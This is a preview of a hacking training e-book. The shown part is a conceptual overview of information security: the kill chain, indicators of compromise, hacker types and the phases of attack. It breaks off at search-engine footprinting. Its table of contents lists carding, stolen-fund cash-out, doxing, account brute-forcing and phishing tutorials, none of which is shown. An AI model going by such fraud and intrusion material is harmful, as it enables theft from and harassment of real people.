Hacking Learn How To Hack Like Pro-V2 [PDF]

Zitiervorschau

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

1|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

IMPORTANT DISCLAIMER The tools and techniques presented are open source, and thus available to everyone. Investigators and pentesters use them regularly in assignments, but so do attackers. If you recently suffered a breach and found a technique or tool illustrated in this book, this neither incriminates the author of this book in any way, nor implies any connection between the author and the perpetrators. Any actions and/or activities related to the material contained within this book are solely your responsibility. Misuse of the information in this book can result in criminal charges being brought against the persons in question. The author will not be held responsible in the event that any criminal charges are brought against any individuals using the information in this book to break the law. This book does not promote hacking, software cracking, and/or piracy. All of the information provided in this book is for educational purposes only. Performing any hack attempts or tests without written permission from the owner of the computer system is illegal.

2|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author nor HackLikePro Publishing or its dealers and distributors will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book. WHO THIS BOOK IS FOR This book starts from scratch, assuming the reader has no prior knowledge of hacking/penetration testing. Therefore, it is for anybody interested in learning how to hack or test the security of systems like real hackers and secure them like security experts. BOOK DESCRIPTION This is a Penetration Testing & Information Security Training Book. This book will empower you with knowledge in a simplified and easily graspable manner. In the training, we teach our students how hackers break into the systems, network, mobiles, and websites to make them aware of the possible loopholes and therefore, making them proficient in reverse-penetration. By doing so, they can create a virtual wall between their data and the hackers. This training will enable you to carry out attacking as well as defensive methodologies which will help you and your organization to not only protect but also assess the safety and vulnerability ratio. READER FEEDBACK  

We always welcome feedback from our students. Let us know what you think, did you find the book useful and if you liked it or not. To send feedback simply sends an email to [email protected].

PIRACY 

 

The free flow of information on the internet has, in addition to many benefits, brought its share of problems, one of them is copyright infringement. We are well aware that we can’t fight every unauthorized copy of this book. However, if you have come upon a copy of this book somewhere on the internet we would like to invite you to take a look at our courses. We are sure once you see the wealth of information and the knowledge you can gain you will support us by subscribing to a course. We often provide discount coupons, making our courses very affordable.

GET IN TOUCH WITH US Keep a connection with us and we have a lot more things for you.    

Instagram: https://instagram.com/hacklikepro/ YouTube: SUBSCRIBE NOW Telegram Channel: https://t.me/hackworm/ Telegram (Admin): https://t.me/elliotmalek/

3|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

CONTENTS IMPORTANT DISCLAIMER ........................................................................................................................................ 2 MODULE 01: INTRODUCTION TO ETHICAL HACKING ..................................................................................................... 6 INFORMATION SECURITY OVERVIEW ........................................................................................................................ 7 MOTIVES, GOALS AND OBJECTIVES OF INFORMATION SECURITY ATTACKS.............................................................. 7 CLASSIFICATION OF ATTACKS ................................................................................................................................. 8 CYBER KILL CHAIN................................................................................................................................................. 10 INDICATORS OF COMPROMISE (IOCS) .................................................................................................................... 12 WHAT IS HACKING? ............................................................................................................................................... 13 WHO IS A HACKER?................................................................................................................................................ 14 TYPES OF HACKERS AND WHAT THEY DO?............................................................................................................. 14 PHASES OF HACKING ............................................................................................................................................ 14 MODULE 02: HOW TO ................................................................................................................................................. 18 FOOTPRINTING THROUGH SEARCH ENGINES ......................................................................................................... 19 FOOTPRINTING USING ADVANCED GOOGLE HACKING TECHNIQUES ....................................................................... 21 FOOTPRINTING THROUGH SOCIAL NETWORKING SITES ......................................................................................... 22 WEBSITE FOOTPRINTING ....................................................................................................................................... 23 EMAIL FOOTPRINTING ........................................................................................................................................... 24 WHOIS FOOTPRINTING .......................................................................................................................................... 25 DNS FOOTPRINTING .............................................................................................................................................. 26 NETWORK FOOTPRINTING ..................................................................................................................................... 27 FOOTPRINTING TOOLS........................................................................................................................................... 28 NETWORK SCANNING ............................................................................................................................................ 29 CHECK FOR LIVE SYSTEMS .................................................................................................................................... 30 CHECK FOR OPEN PORTS....................................................................................................................................... 31 SCANNING BEYOND IDS ......................................................................................................................................... 38 HOW HACKERS HACK WEBCAM USING ENTROPY AND SHODAN ............................................................................. 39 HOW TO HACK WINDOWS LOCKSCREEN/ADMIN PASSWORD: ................................................................................. 42 HOW HACKERS BYPASS GOOGLE PLAY SECURITY .................................................................................................. 45 HOW TO FIND OUT EXACT LOCATION OF THE PERSON USING SEEKER .................................................................... 47 HOW HIDE DATA FILES IN IMAGES USING STEGHIDE .............................................................................................. 54 HOW TO HACK ANDROID WITH EVILDROID ............................................................................................................. 56 HOW TO CRACK WINDOWS 10 PASSWORD WITH OPHCRACK .................................................................................. 60 4|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER HOW TO PERFORM A DOS ATTACK "SLOW HTTP" WITH SLOWHTTPTEST ................................................................ 62 HOW TO HIDE DATA IN AN AUDIO FILE ................................................................................................................... 65 HOW TO DOX SOMEONE USING SNAPCHAT ............................................................................................................ 65 HOW TO HACK INSTAGRAM ACCOUNT [BRUTEFORCE] ............................................................................................ 66 CRACK A PDF PASSWORD WITH BRUTE FORCE USING JOHN THE RIPPER ............................................................... 67 SHELLPHISH: A PHISHING TOOL ............................................................................................................................ 71 EVILGINX2- ADVANCED PHISHING ATTACK FRAMEWORK ....................................................................................... 72 MODULE 03: GETTING STARTED IN BUG BOUNTY HUNTING ........................................................................................ 74 PHASE #01 ............................................................................................................................................................ 75 PHASE #02 ............................................................................................................................................................ 78 PHASE #03 ............................................................................................................................................................ 94 ENDING NOTE! ....................................................................................................................................................... 95 MODULE 04: ALL ABOUT CARDING ............................................................................................................................. 96 LET’S START WITH THE BASICS ............................................................................................................................. 98 TYPES OF CREDIT CARD ......................................................................................................................................... 99 SETUP SOCKS PROXY IN FIREFOX ........................................................................................................................ 101 CARDING PROCESS .............................................................................................................................................. 102 PERSONAL ADVICE: ............................................................................................................................................. 102 HOW TO GET FREE CREDIT CARD USING HAVIJ .................................................................................................... 103 ARE YOU FINDING A CARDABLE SITE? .................................................................................................................. 106 CASHOUT TUTORIAL | PAYPAL - CC – BTC ........................................................................................................... 106

5|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

MODULE 01: INTRODUCTION TO ETHICAL HACKING

6|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

INFORMATION SECURITY OVERVIEW Information security refers to the protection or safeguarding of information and information systems that use, store and transmit information from unauthorized access, disclosure, alteration and destruction. Formation is a critical set that organizations must secure. If sensitive information Falls into the wrong hands, then the respective organization may suffer huge losses in terms of Finance, brand reputation, customer, or in other ways. To provide an understanding of how to secure such critical information resources. This section starts with an overview of information security. Information Security programs are built around 3 objectives, commonly known as CIA – Confidentiality, Integrity, Availability. ELEMENTS OF INFORMATION SECURITY Information security is “the state of the well-being of information and infrastructure in which the possibility of theft, tempering or disruption of Information and services is kept low or tolerable.” It relies on five major elements : confidentiality, integrity, availability, authenticity and non-repudiation. 









Confidentiality - Confidentiality is the assurance that the information is accessible only to the authorized. Confidentiality breaches may occur due to improper data handling for a hacking attempt. Confidentiality controls include data classification, data encryption and proper disposal of equipment (such as DVDs, USB driver and Blu-ray discs) Integrity - Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes – The Assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data is not changed) and access control (which ensures that only authorized people can update, add or delete data) Availability - Availability is the Assurance that the system responsible for delivering, storing and processing information are accessible when required by authorized users. Measures to maintain data availability can include disk arrays for redundant systems and clustered machines, antivirus software to combat malware and distributed denial-of-service (DDos) prevention systems. Authenticity - Authenticity Refer to the characteristic of communication documents for any data that ensured the equality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. controls such as biometrics smart cards and digital certificates and sure The authenticity of data transactions communications and documents. Non-Repudiation - Non-Repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.

MOTIVES, GOALS AND OBJECTIVES OF INFORMATION SECURITY ATTACKS Attackers generally have motives (goals), and objectives behind their information security attacks. A motive originates out of the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization’s business operations, to steal valuable information for the sake of curiosity, or even to exact revenge. Therefore, these motives or goals depend on the attacker’s state of mind, their reason for carrying out such an activity, as well as their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or security policy and controls.

7|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

ATTACKS = MOTIVE (GOAL) + METHOD + VULNERABILITY Motives Behind Information Security Attacks          

Disrupt business continuity Manipulating data Damage the reputation of the target Create fear and chaos by disrupting critical infrastructures Take revenge Demand ransom Propagate religious or political beliefs Perform information theft Achieve a state’s military objectives Bring financial loss to the target

CLASSIFICATION OF ATTACKS According to IATF, security attacks are classified into five categories: passive, active, close-in, insider, and distribution. 



Passive Attacks - Passive attacks involve intercepting and monitoring network traffic and data flow on the target network and do not tamper with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect as the attacker has no active interaction with the target system or network. Passive attacks allow attackers to capture the data or files being transmitted in the network without the consent of the user. For example, an attacker can obtain information such as unencrypted data in transit, clear-text credentials, or other sensitive information that is useful in performing active attacks. Examples of passive attacks: o Footprinting o Sniffing and eavesdropping o Network traffic analysis o Decryption of weakly encrypted traffic Active Attacks - Active attacks tamper with the data in transit or disrupt communication or services between the systems to bypass or break into secured systems. Attackers launch attacks on the target system or network by sending traffic actively that can be detected. These attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target’s internal network and gain access to a remote system to compromise the internal network. Examples of active attacks: o o o o o o o o o o o

Denial-of-service (DoS) attack Firewall and IDS attack Bypassing protection mechanisms Profiling Malware attacks (such as viruses, worms, ransomware) Arbitrary code execution Modification of information Privilege escalation Backdoor access Spoofing attacks Cryptography attacks 8|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER







o Replay attacks o SQL injection o Password-based attacks o XSS attacks o Session hijacking o Directory traversal attacks o Man-in-the-Middle attack o Exploitation of application and OS software o DNS and ARP poisoning o Compromised-key attack Close-in Attacks - Close-in attacks are performed when the attacker is in close physical proximity with the target system or network. The main goal of performing this type of attack is to gather or modify information or disrupt its access. For example, an attacker might shoulder surf user credentials. Attackers gain close proximity through surreptitious entry, open access, or both. Examples of close-in attacks: o Social engineering (Eavesdropping, shoulder surfing, dumpster diving, and other methods) Insider Attacks - Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization’s assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization’s business operations, reputation, and profit. It is difficult to figure out an insider attack. Examples of insider attacks: o Eavesdropping and wiretapping o Theft of physical devices o Social engineering o Data theft and spoliation o Pod slurping o Planting keyloggers, backdoors, or malware Distribution Attacks - Distribution attacks occur when attackers tamper with hardware or software prior to installation. Attackers tamper the hardware or software at its source or when it is in transit. Examples of distribution attacks include backdoors created by software or hardware vendors at the time of manufacture. Attackers leverage these backdoors to gain unauthorized access to the target information, systems, or network. o Modification of software or hardware during production o Modification of software or hardware during distribution

9|Page

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

CYBER KILL CHAIN

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization. This model helps organizations understand the various possible threats at every stage of an attack and the necessary countermeasures to defend against such attacks. Also, this model provides security professionals with a clear insight into the attack strategy used by the adversary so that different levels of security controls can be implemented to protect the IT infrastructure of the organization. Cyber Kill Chain Methodology The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. This methodology helps security professionals in identifying the steps that adversaries follow in order to accomplish their goals. The cyber kill chain is a framework developed for securing cyberspace based on the concept of military kill chains. This method aims to actively enhance intrusion detection and response. The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats. According to Lockheed Martin, cyberattacks might occur in seven different phases, from reconnaissance to the final accomplishment of the objective. An understanding of cyber kill chain methodology helps security professionals to leverage security controls at different stages of an attack and helps them to prevent the attack before it succeeds. 

Reconnaissance - An adversary performs reconnaissance to collect as much information about the target as possible to probe for weak points before actually attacking. They look for information such as publicly available information on the Internet, network information, system information, and the organizational information of the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools such as open ports and services, vulnerabilities in applications, and login credentials, to obtain information. Such information can help the adversary in gaining backdoor access to the target network. The following are the activities of the adversary: o Gathering information about the target organization by searching the Internet or through social engineering 10 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER









o Performing analysis of various online activities and publicly available information o Gathering information from social networking sites and web services o Obtaining information about websites visited o Monitoring and analyzing the target organization’s website o Performing Whois, DNS, and network footprinting o Performing scanning to identify open ports and services Weaponization - The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary: o Identifying appropriate malware payload based on the analysis o Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability o Creating a phishing email campaign o Leveraging exploit kits and botnets Delivery - The previous stage included creating a weapon. Its payload is transmitted to the intended victim(s) as an email attachment, via a malicious link on websites, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not. The following are the activities of the adversary: o Sending phishing emails to employees of the target organization o Distributing USB drives containing malicious payload to employees of the target organization o Performing attacks such as watering hole on the compromised website o Implementing various hacking tools against the operating systems, applications, and servers of the target organization Exploitation - After the weapon is transmitted to the intended victim, exploitation triggers the adversary’s malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration. The following are the activities of the adversary: o Exploiting software or hardware vulnerabilities to gain remote access to the target system Installation - The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor to gain remote access. After the injection of the malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. Also, the adversary tries to hide the presence of malicious activities from security controls like firewalls using various techniques such as encryption. The following are the activities of the adversary: o Downloading and installing malicious software such as backdoors o Gaining remote access to the target system

11 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Leveraging various methods to keep backdoor hidden and running Maintaining access to the target system Command and Control - The adversary creates a command and control channel, which establishes two-way communication between the victim’s system and adversary-controlled server to communicate and pass data back and forth. The adversaries implement techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network. The following are the activities of the adversary: o Establishing a two-way communication channel between the victim’s system and the adversarycontrolled server o Leveraging channels such as web traffic, email communication, and DNS messages. o Applying privilege escalation techniques o Hiding any evidence of compromise using techniques such as encryption Actions on Objectives - The adversary controls the victim’s system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts the services or network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. Also, the adversary may use this as a launching point to perform other attacks. o





INDICATORS OF COMPROMISE (IOCS) Cyber threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of loCs to effectively and efficiently detect and respond to evolving cyber threats. Indicators of Compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization's infrastructure. However, loCs are not intelligence; rather, loCs act as a good source of information about threats that serve as data points in the intelligence process. Actionable threat intelligence extracted from loCs helps organizations enhance incident-handling strategies. Cybersecurity professionals use various automated tools to monitor loCs to detect and prevent various security breaches to the organization. Monitoring loCs also helps security teams enhance the security controls and policies of the organization to detect and block suspicious traffic to thwart further attacks. To overcome the threats associated with loCs, some organizations like STIX and TAXII have developed standardized reports that contain condensed data related to attacks and shared it with others to leverage the incident response. An loC is an atomic indicator, computed indicator, or behavioral indicator. It is the information regarding suspicious or malicious activities that is collected from various security establishments in a network's infrastructure. Atomic indicators are those that cannot be segmented into smaller parts, and whose meaning is not changed in the context of an intrusion. Examples of atomic indicators are IP addresses and email addresses. Computed indicators are obtained from the data extracted from a security incident. Examples of computed indicators are hash values and regular expressions. Behavioral indicators refer to a grouping of both atomic and computed indicators, combined on the basis of some logic. CATEGORIES OF INDICATORS OF COMPROMISE The cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called Indicators of Compromise (loCs). This understanding of loCs helps security professionals quickly detect the threats entering the organization and protect the organization from evolving threats. For this purpose, loCs are divided into four categories:

12 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER 







Email Indicators - Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender's email address, email subject, and attachments or links. Network Indicators - Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computer-specific information. Examples of network indicators include URLs, domain names, and IP addresses. Host-Based Indicators - Host-based indicators are found by performing an analysis of the infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutex. Behavioral Indicators - Generally, typical loCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MDS hash, and domain names. Behavioral loCs are used to identify specific behavior related to malicious activities such as code injection into the memory or running the scripts of an application. Well-defined behaviors enable broad protection to block all current and future malicious activities. These indicators are useful to identify when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include document executing PowerShell script, and remote command execution.

Listed below are some of the key Indicators of Compromise (loCs): o o o o o o o o o o o o o o

Unusual outbound network traffic Unusual activity through a privileged user account Geographical anomalies Multiple login failures Increased database read volume Large HTML response size Multiple requests for the same file Mismatched port-application traffic Suspicious registry or system file changes Unusual DNS requests Unexpected patching of systems Signs of Distributed Denial-of-Service (DDoS) activity Bundles of data in the wrong places Web traffic with superhuman behavior

WHAT IS HACKING? Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves a modifying system or application features to achieve a goal outside its creator’s original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss. Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, for thrill, intellectual challenge, curiosity, experiment, knowledge, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.

13 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

WHO IS A HACKER? A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer’s software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.

TYPES OF HACKERS AND WHAT THEY DO? Hackers usually fall into one of the following categories, according to their knowledge & activities:  







  

Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers. White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the system owner. Gray Hats: Gray hats are the individuals who work both offensively and defensively at various times. Gray hats might help hackers to find various vulnerabilities in a system or network and, at the same time, help vendors to improve products (software or hardware) by checking limitations and making them more secure. Suicide Hackers: Suicide hackers are individuals who aim to bring down critical infrastructure for a “cause” and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life for an attack and are thus not concerned with the consequences of their actions. Script Kiddies: Script kiddies are unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity rather than the quality of the attacks that they initiate. Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks. State-Sponsored Hackers: State-sponsored hackers are individuals employed by the government to penetrate, gain top-secret information from, and damage the information systems of other governments. Hacktivist: Hacktivism is when hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both the online and offline arenas. They are individuals who use hacking to promote a political agenda, especially by defacing or disabling websites.

Common hacktivist targets include government agencies, multinational corporations, and any other entity that they perceive as a threat. Irrespective of the hacktivists intentions, the gaining of unauthorized access is a crime.

PHASES OF HACKING An Ethical Hacker is also known as a Penetration Tester in the industry. Ethical hackers are proficient with the penetration testing lifecycle. An organization hires ethical hackers so that they can conduct several penetration tests on the organization’s digital infrastructure with the management’s approval and discover vulnerabilities in the system so that they can be patched before a real attacker targets the system. 14 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER There is a common misconception among masses that an ethical hacker or a penetration tester just needs to sit on a computer, run a piece of code, and they can gain access to any system in the world. People have this notion mostly because of things they see in movies, but it is far away from the truth. Professionals in this field are very careful and precise with their approach to discover and understand exploits in a computer system. Over the years, a definite framework has been established, which has been adopted by ethical hackers. The first four stages of this framework guide an ethical hacker to discover vulnerabilities in a system and understand to what level these vulnerabilities can be exploited. In comparison, the final stage ends up documenting the actions of the first four stages in a neat report to be presented to the senior management of the organization. This framework has not only created a proper planning and execution structure for an ethical hacker. Still, it has also proved to be very efficient for conducting penetration tests at multiple levels of an organization’s digital infrastructure. Every stage gathers inputs from the previous stage and further provides inputs to the next stage. The process runs in a sequence, but it is not uncommon for ethical hackers to return to a previous stage to analyze previously discovered information. THE FIVE STAGES OF THE PENETRATION TESTING LIFECYCLE We will discuss the five stages of the penetration testing lifecycle with an analogy to the functioning of an army in a war situation on the international borders. 1. Hacking Phase: Reconnaissance - Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization’s clients, employees, operations, network, and systems. This phase allows attackers to plan the attack. It may take some time as the attacker gathers as much information as possible. Part of this reconnaissance may involve social engineering. A social engineer is a person who convinces people to reveal information such as unlisted phone numbers, passwords, and other sensitive information. For instance, the hacker could call the target’s Internet service provider and, using personal information previously obtained, convince the customer service representative that the hacker is actually the target, and in doing so, obtain even more information about the target. Another reconnaissance technique is dumpster diving. Dumpster diving is, simply enough, looking through an organization’s trash for any discarded sensitive information. Attackers can use the Internet to obtain information such as employees’ contact information, business partners, technologies currently in use, and other critical business knowledge. Dumpster diving may even provide attackers with even more sensitive information, such as usernames, passwords, credit card statements, bank statements, ATM receipts, Social Security numbers, private telephone numbers, checking account numbers, or other sensitive data. Searching for the target company’s web site in the Internet’s Whois database can easily provide hackers with the company’s IP addresses, domain names, and contact information. 

Reconnaissance Types

Reconnaissance techniques are broadly categorized into active and passive. When an attacker is using passive reconnaissance techniques, they do not interact with the target directly. Instead, the attacker relies on publicly available information, news releases, or other no-contact methods. Active reconnaissance techniques, on the other hand, involve direct interactions with the target system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications. 15 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER Attackers use active reconnaissance when there is a low probability of the detection of these activities. For example, they may make telephone calls to the help desk or technical department. As an ethical hacker, it is important to be able to distinguish among the various reconnaissance methods and advocate preventive measures in the light of potential threats. Companies, on their part, must address security as an integral part of their business and operational strategies, and be equipped with the proper policies and procedures to check for potential vulnerabilities. 2. Hacking Phase: Scanning Scanning is the phase immediately preceding the attack. Here, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a logical extension of active reconnaissance, and in fact, some experts do not differentiate scanning from active reconnaissance. There is a slight difference, however, in that scanning involves more in-depth probing on the part of the attacker. Often the reconnaissance and scanning phases overlap, and it is not always possible to separate the two. An attacker can gather critical network information such as the mapping of systems, routers, and firewalls by using simple tools such as the standard Windows utility Traceroute. Alternatively, they can use tools such as Cheops to add additional information to Traceroute’s results. Scanning can include the use of dialers, port scanners, network mappers, ping tools, vulnerability scanners, or other tools. Attackers extract information such as live machines, port, port status, OS details, device type, and system uptime to launch an attack. Port scanners detect listening ports to find information about the nature of services running on the target machine. The primary defense technique against port scanners is shutting down services that are not required and implementing appropriate port filtering. However, attackers can still use tools to determine the rules implemented by the port filtering. The most commonly used tools are vulnerability scanners, which can search for thousands of known vulnerabilities on a target network. This gives the attacker an advantage because he or she only has to find a single means of entry, while the systems professional has to secure as much vulnerability as possible by applying patches. Organizations that use intrusion detection systems still have to remain vigilant because attackers can and will use evasion techniques wherever possible. 3. Hacking Phase: Gaining Access - This is the phase in which real hacking occurs. Attackers use vulnerabilities identified during the reconnaissance and scanning phases to gain access to the target system and network. Gaining access refers to the point where the attacker obtains access to the operating system or to applications on the computer or network. The attacker can gain access to the operating system, application, or network level. Even though attackers can cause plenty of damage without gaining any access to the system, the impact of unauthorized access is catastrophic. For instance, external denial-of-service attacks can either exhaust resources or stop services from running on the target system. Ending processes can stop a service, using a logic bomb or time bomb, or even reconfigure and crash the system. Furthermore, attackers can exhaust system and network resources by consuming all outgoing communication links. Attackers gain access to the target system locally (offline), over a LAN, or the Internet. Examples include password cracking, stack-based buffer overflows, denial-of-service, and session hijacking. Using a technique called spoofing to exploit the system by pretending to be a legitimate user or different system, attackers can send a data packet containing a bug to the target system in order to exploit a vulnerability. Packet flooding also breaks the availability of essential services. Smurf attacks attempt to cause users on a network to flood each other with data, making it appear as if everyone is attacking each other, and leaving the hacker anonymous.

16 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER A hacker’s chances of gaining access to a target system depend on several factors such as the architecture and configuration of the target system, the skill level of the perpetrator, and the initial level of access obtained. Once an attacker gains access to the target system, they then try to escalate privileges in order to take complete control. In the process, they also compromise the intermediate systems that are connected to it. 4. Hacking Phase: Maintaining Access - Maintaining access refers to the phase when the attacker tries to retain his or her ownership of the system. Once an attacker gains access to the target system with admin or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or to keep a low profile and continue their exploitation. Both of these actions can cause a great amount of damage. For instance, the hacker could implement a sniffer to capture all network traffic, including Telnet and FTP (file transfer protocol) sessions with other systems, and then transmit that data wherever they please. Attackers who choose to remain undetected remove evidence of their entry and install a backdoor or a trojan to gain repeat access. They can also install rootkits at the kernel level to gain full administrative access to the target computer. Rootkits gain access at the operating system level, while trojans gain access at the application level. Both rootkits and trojans require users to install them locally. In Windows systems, most trojans install themselves as a service and run as part of the local system with administrative access. Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and can also use trojans to transfer usernames, passwords, and any other information stored on the system. They can maintain control over the system for a long time by closing up vulnerabilities to prevent other hackers from taking control of them, and sometimes, in the process, render some degree of protection to the system from other attacks. Attackers use the compromised system to launch further attacks. 5. Hacking Phase: Clearing Tracks - For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usually attempt to erase all evidence of their actions. Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. The attacker’s intentions include continuing access to the victim’s system, remaining unnoticed and uncaught, and deleting evidence that might lead to their own prosecution. They use utilities such as PsTools (https://docs.microsoft.com), Netcat, or trojans to erase their footprints from the system’s log files. Once the trojans are in place, the attacker has most likely gained total control of the system and can execute scripts in the trojan or rootkit to replace the critical system and log files to hide their presence in the system. Attackers always cover their tracks to hide their identity. Other techniques include steganography and tunneling. Steganography is the process of hiding data in other data, for instance, in image and sound files. Tunneling takes advantage of the transmission protocol by carrying one protocol over another. Attackers can use even a small amount of extra space in the data packet’s TCP and IP headers to hide information. An attacker can use the compromised system to launch new attacks against other systems or as a means of reaching another system on the network undetected. Thus, this phase of the attack can turn into another attack’s reconnaissance phase. System administrators can deploy host-based IDS (intrusion detection systems) and antivirus software in order to detect trojans and other seemingly compromised files and directories. An ethical hacker must be aware of the tools and techniques that attackers deploy so that they can advocate and implement the countermeasures detailed in subsequent modules.

17 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

MODULE 02: HOW TO

18 | P a g e

INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

FOOTPRINTING THROUGH SEARCH ENGINES 



Attackers use search engines to extract information about a target such as technology platforms, employee details, login pages, intranet portals, etc. which helps in performing social engineering and other types of advanced system attacks. Search engine caches and internet archives may also provide sensitive information that has been removed from the World Wide Web (WWW).

FINDING COMPANY'S PUBLIC AND RESTRICTED WEBSITES   

Search for the target company's external URL in a search engine such as Google, Bing, etc. Restricted URLs provide an insight into different departments and business units in an organization. You may find a company's restricted URLs by trial and error method or using a service such as http://www.netcraft.com

DETERMINING THE OPERATING SYSTEM  
